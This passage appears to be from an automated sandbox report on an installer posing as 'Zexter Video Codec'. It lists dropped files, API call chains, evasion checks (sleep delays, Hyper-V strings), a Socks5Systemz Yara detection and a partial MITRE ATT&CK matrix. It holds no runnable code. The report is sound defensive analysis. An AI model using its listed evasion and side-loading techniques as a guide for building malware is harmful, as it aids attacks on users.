        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_004833BC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F128
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02BCF97D
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeWindow / User API: threadDelayed 4765Jump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeWindow / User API: threadDelayed 5072Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-4BT74.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-OCNI8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-MJPNF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-6S03E.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-G59D3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-I8TQ0.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-6DO3I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-FGQU3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libstdc++-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-4L8QF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-65SGC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-H2J0H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-O9QDL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-D169I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-4GU98.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libxml2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-QACPG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-4SCDL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-BA0AN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libfreetype-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-9G1LK.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-MOHPK.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-7G2MG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-OMDJC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-61SBR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libglib-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libiconv-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-FLD95.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-MVKEA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-MMD8V.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-ILE5I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgio-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-S5KF0.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgiomm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-2TIQ1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\is-1611L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-4PKG7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-MI7QU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-2DT7G.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-JTN8Q.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-TNU6F.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\is-PM61J.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Zexter Video Codec\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5688
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-21689
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984Thread sleep count: 4765 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984Thread sleep time: -9530000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 5036Thread sleep count: 76 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 5036Thread sleep time: -4560000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984Thread sleep count: 5072 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984Thread sleep time: -10144000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00452A4C FindFirstFileA,GetLastError,1_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,1_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497A74
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeThread delayed: delay time: 60000Jump to behavior
        Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000007CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW B
        Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000008A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
        Source: zextervideocodec32_64.exe, 00000003.00000002.3289222096.00000000034F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeAPI call chain: ExitProcess graph end nodegraph_0-6728
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeAPI call chain: ExitProcess graph end nodegraph_3-19441
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeAPI call chain: ExitProcess graph end nodegraph_3-21909
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BE019E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02BE019E
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BE019E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02BE019E
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502AC
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BC648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,3_2_02BC648B
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BD9508 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02BD9508
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478420
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E0AC
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BCF831 cpuid 3_2_02BCF831
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: GetLocaleInfoA,0_2_004051FC
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: GetLocaleInfoA,0_2_00405248
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: GetLocaleInfoA,1_2_00408570
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: GetLocaleInfoA,1_2_004085BC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_0045892C
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00455588 GetUserNameA,1_2_00455588
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

        Stealing of Sensitive Information

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3288670577.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: zextervideocodec32_64.exe PID: 1216, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3288670577.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: zextervideocodec32_64.exe PID: 1216, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API        		1
        DLL Side-Loading        		1
        Exploitation for Privilege Escalation        		1
        Deobfuscate/Decode Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Service Execution        		5
        Windows Service        		1
        DLL Side-Loading        		2
